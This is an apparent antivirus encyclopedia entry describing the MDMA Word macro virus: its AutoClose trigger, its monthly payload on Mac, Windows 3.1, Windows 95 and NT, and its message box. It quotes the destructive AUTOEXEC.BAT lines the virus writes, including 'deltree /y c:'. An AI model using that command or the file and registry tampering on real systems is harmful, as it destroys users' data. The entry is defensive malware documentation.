Macro Virus: Wordmacro/MDMA
Name: MDMA Virus
Type: Word Macro Virus
Description:
The MDMA macro virus consists of a single macro, AutoClose. It
infects under all versions of WinWord 6.0 and above, i.e., on both Mac
and PC platforms.
On the 1st of any month, the virus activates its payload. The payload
depends on the platform.
- On Macs, the virus intends to delete all files in the current
folder. Due to a bug, a syntax error occurs and no damage is done.
- On WinNT, the virus deletes all files in the current directory and
the file c:\shmk.
- On Windows 3.1, the virus deletes the file c:\shmk and overwrites
C:\AUTOEXEC.BAT with the following commands:
    @echo off
    deltree /y c:
    @echo You have just been phucked over by a virus
- On Win95, the virus deletes the files c:\shmk, c:\windows\*.hlp, and
c:\windows\system\*.cpl. In the Registry, it sets the Accessibility
options StickyKeys and HighContrast to ON, and the execution of login
scripts during network logon to OFF. Due to a bug, it doesn't succeed in
setting the HighContrast option.
After performing one of the above actions, the virus displays a message box
with the following contents:
    You are infected with MDMA_DMV.
    Brought to you by MDMA (Many Delinquent Modern Anarchists).
This analysis was based on information provided by Vesselin Bontchev, Frisk
Software.